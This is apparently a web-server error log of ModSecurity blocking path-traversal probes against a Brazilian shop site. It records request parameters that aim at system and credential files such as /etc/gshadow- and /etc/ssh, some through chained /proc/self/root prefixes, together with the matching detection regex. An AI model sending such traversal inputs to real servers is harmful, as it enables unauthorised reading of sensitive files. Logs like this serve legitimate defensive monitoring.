[Fri Mar 20 11:15:14.830605 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.38:59206] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1WcvqxLDW4GITHUkQUqwAAARA"]
[Fri Mar 20 11:15:27.551366 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:34480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WfzJ3M9BSuKP7CAZQWgAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:15:35.283498 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.243.128:43658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WhwF0L0L-SsrnPo6TYgAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:15:46.459180 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.244.43:57202] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1WkvXLqtnMIWvjpaLGKAAAApM"]
[Fri Mar 20 11:15:46.521783 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:38514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WkuoXxyEfFpUF8f-q7QAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:15:47.891515 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:48228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WkwF0L0L-SsrnPo6TbwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:15:54.845081 2026] [mime_magic:error] [pid 15826:tid 140411666392832] (70014)End of file found: [client 57.141.18.116:60528] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:15:55.415680 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.2:60460] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Wm_qxLDW4GITHUkQUwAAAAQ4"]
[Fri Mar 20 11:16:00.785296 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.20:60714] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1WoDJ3M9BSuKP7CAZQawAAAIY"]
[Fri Mar 20 11:16:21.519876 2026] [:error] [pid 31215:tid 140411691570944] [client 57.141.18.108:32870] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1WtQF0L0L-SsrnPo6ThQAAAsY"]
[Fri Mar 20 11:16:47.678352 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.79:33778] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Wz_HIg5MgXLBnicMgpwAAAcE"]
[Fri Mar 20 11:17:19.656625 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.243.128:35776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1W711pVZ5mVmJwsFNaAQAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:17:32.607607 2026] [:error] [pid 7235:tid 140411741927168] [client 57.141.18.88:35228] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1W_PqxLDW4GITHUkQU-AAAAQA"]
[Fri Mar 20 11:17:38.188014 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.243.128:35154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XAl1pVZ5mVmJwsFNaFwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:17:42.118742 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:43254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XBTJ3M9BSuKP7CAZQwwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:17:50.207137 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:43260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XDjJ3M9BSuKP7CAZQzwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:17:50.264784 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:46132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XDgF0L0L-SsrnPo6TqQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:17:56.219200 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:46146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XFDJ3M9BSuKP7CAZQ3gAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:17:56.652515 2026] [mime_magic:error] [pid 26799:tid 140411649607424] (70014)End of file found: [client 57.141.18.74:35918] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:18:01.591464 2026] [:error] [pid 21219:tid 140411624429312] [client 57.141.18.88:36046] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1XGfXLqtnMIWvjpaLGaQAAAo4"]
[Fri Mar 20 11:18:07.595506 2026] [:error] [pid 11642:tid 140411632822016] [client 57.141.18.124:36208] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1XH7ninkcc-iUj5AqIJQAAA40"]
[Fri Mar 20 11:18:08.387583 2026] [:error] [pid 7893:tid 140411674785536] [client 57.141.18.15:36264] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1XIBCii7xarUs8iHaVWQAAAgg"]
[Fri Mar 20 11:18:11.394120 2026] [:error] [pid 11167:tid 140411649607424] [client 57.141.18.114:36300] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1XI_HIg5MgXLBnicMgzwAAAcs"]
[Fri Mar 20 11:18:17.807211 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:56908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XKV1pVZ5mVmJwsFNaNgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:18:25.706174 2026] [:error] [pid 11642:tid 140411599251200] [client 57.141.18.43:36766] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1XMLninkcc-iUj5AqIMQAAA5E"]
[Fri Mar 20 11:18:28.146400 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.66:36826] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1XMhCii7xarUs8iHaVYQAAAgQ"]
[Fri Mar 20 11:18:37.240246 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:34074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XPfqxLDW4GITHUkQVKgAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
